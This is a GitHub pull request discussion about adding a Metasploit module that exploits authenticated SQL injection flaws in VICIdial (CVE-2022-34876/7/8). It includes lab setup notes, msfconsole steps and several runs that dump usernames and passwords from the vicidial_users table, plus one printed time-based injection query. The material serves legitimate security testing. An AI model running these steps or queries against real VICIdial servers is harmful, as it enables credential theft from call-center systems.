-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
VICIdial Multiple SQLi (CVE-2022-34876, CVE-2022-34877, CVE-2022-34878) #16732
Conversation
Drafted because this is a place holder and not ready for review. |
Setting up this software was.... an exercise in frustration. I know I kept step by step notes and module docs, but I can't seem to find them. I'm going to take a little time to find it again before making this ready for review |
Maybe this will help: Also, GOautodial and VICIbox are available as an ISO and come with VICIdial installed by default. This makes testing much easier. Also, it would be worth testing the module on VICIbox and GOautodial anyway, as this is probably one of the most common methods of VICIdial deployment [citation needed]. |
Hey @h00die, thanks for the contribution. Just wondering if you have any update on this? No worries if not. I might spin up one of the ISOs bcoles mentioned and give it a test if you think it's almost ready. |
I don't, been busy with life and prioritizing the VMware post module work over my own module stuff. If you want to try, go for it! If not it's ok to sit here another week or two so I can get VMware buttoned up and then write this up |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
No worries at all @h00die, just checking in. I gave it a test and put together some documentation. I tried pushing up the changes to a PR on your fork but got a permissions denied error - I was likely doing something incorrectly my apologies, so it's just included below.
Durning testing 2 of the 5 actions were failing while testing against ViciBox_v9. I'll investigate a bit further today:
List Users - access_recordings method working
List Users - agent_time_sheet method Testing of SQLi failed.
List Users - agentcall_email method working
List Users - modify_email_accounts method working
List Users - user_stats method Testing of SQLi failed.
This module exploits several authenticated SQL Inject vulnerabilities in VICIdial 2.14b0.5 prior to
svn/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable)
Vulnerable Application
- Install the following OpenSUSE 10 ISO ViciBox_v9.x86_64-9.0.3.iso:
- Change the default password
- Set Timezone, Keyboard Layout and Language
- Network settings should autoconfigure (Tested on VMware Fusion). Network settings can be configured with the
commandyast lan
if necessary
- Run
vicibox-express
to initiate the ViciDial Express Installation, everything can be kept as default - Navigate to
http://<ip-address>/
- Click
Administration
and login with default credentials username:6666
, password:1234
- Once logged in, Click "Finish setup". Everything can be kept as default.
- Click
- The complete list of setup instructions can be found by following this link
Verification Steps
- Start msfconsole
- Do:
use auxiliary/scanner/http/vicidial_multiple_sqli
- Do:
set username <username>
- Do:
set password <password>
- Do
show actions
- Select from the list or keep the default
- Do:
run
- The module will exploit the selected SQL injection and return the extracted usernames and passwords
Scenarios
ViciBox_v9.x86_64-9.0.3 using the List Users - modify_email_accounts method:
msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
verbose => true
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
password => notpassword
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - modify_email_accounts method
action => List Users - modify_email_accounts method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
[*] Enumerating Usernames and Password Hashes
[*] {SQLi} Executing (select group_concat(TXMlUAF) from (select cast(concat_ws(';',ifnull(user,''),ifnull(pass,'')) as binary) TXMlUAF from vicidial_users limit 3) jUFFwQn)
[*] {SQLi} Encoded to (select group_concat(TXMlUAF) from (select cast(concat_ws(0x3b,ifnull(user,repeat(0x87,0)),ifnull(pass,repeat(0x52,0))) as binary) TXMlUAF from vicidial_users limit 3) jUFFwQn)
[*] {SQLi} Time-based injection: expecting output of length 46
[!] No active DB -- Credential data will not be saved!
[+] Dumped table contents:
vicidial_users
==============
user pass
---- ----
6666 notpassword
VDAD donotedit
VDCL donotedit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Thanks for mentioning this bcoles. @h00die for transparency I installed and setup GOautodial and the module as it's written is unable to authenticate with the application. The login URI's and authentication requirements are a bit different. Edit: Not sure if you'll want to investigate this further. If you do, when installing GOautodial this link is useful. If not, outlining what this module has been tested on and what it is intended to work on might be sufficient. |
not surprising about GOautodial using a different url structure. My schedule is freeing up, hoping to restart this and get it finished soon. I used ViciBox_v10.x86_64-10.0.0.iso, not 9, so that may account for some of the modules not working as new features may have been added. When I work on the doc, i'll do 9 and 10 at the same time. |
vicidial sqli module first run of docs updates to vicidial
I think I remember vicidial being a pain because I was testing each page and API endpoint. The exploitable ones in here actually required little to nothing to setup and exploit. |
Tested against 9.0.3 and 10.0.0, added docs, ready for real review! Also did a rebase |
ping @jheysel-r7 just wanted to check if youd have time to get back around to this one |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks @h00die! Great module. Tested and everything looks good. I ran ruby tools/dev/msftidy_docs.rb documentation/modules/auxiliary/scanner/http/vicidial_multiple_sqli.md
and made a couple of minor suggestions based on the output.
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - access_recordings method
action => List Users - access_recordings method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============
user pass
---- ----
6666 notpassword
VDAD donotedit
VDCL donotedit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - agent_time_sheet method
action => List Users - agent_time_sheet method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============
user pass
---- ----
6666 notpassword
VDAD donotedit
VDCL donotedit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - agentcall_email method
action => List Users - agentcall_email method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============
user pass
---- ----
6666 notpassword
VDAD donotedit
VDCL donotedit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - modify_email_accounts method
action => List Users - modify_email_accounts method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============
user pass
---- ----
6666 notpassword
VDAD donotedht
VDCL donoDedit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - user_stats method
action => List Users - user_stats method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============
user pass
---- ----
6666 notpassword
VDAD donotedit
VDCL donotedit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
documentation/modules/auxiliary/scanner/http/vicidial_multiple_sqli.md
Outdated
Show resolved
Hide resolved
documentation/modules/auxiliary/scanner/http/vicidial_multiple_sqli.md
Outdated
Show resolved
Hide resolved
documentation/modules/auxiliary/scanner/http/vicidial_multiple_sqli.md
Outdated
Show resolved
Hide resolved
documentation/modules/auxiliary/scanner/http/vicidial_multiple_sqli.md
Outdated
Show resolved
Hide resolved
addressed the comments, retested on my side, should be good to ship! |
Release NotesThis PR adds a module which exploits several authenticated sqli in VICIdial (CVE-2022-34876, CVE-2022-34877, CVE-2022-34878) |
This PR adds a module which exploits several authenticated sqli in VICIdial. Of note, two of the modules require a permissions change (vicibox sets admin permissions to near nothing, other than the ability to change permissions).
Verification
msfconsole
use auxiliary/scanner/http/vicidial_multiple_sqli
set rhosts and password
run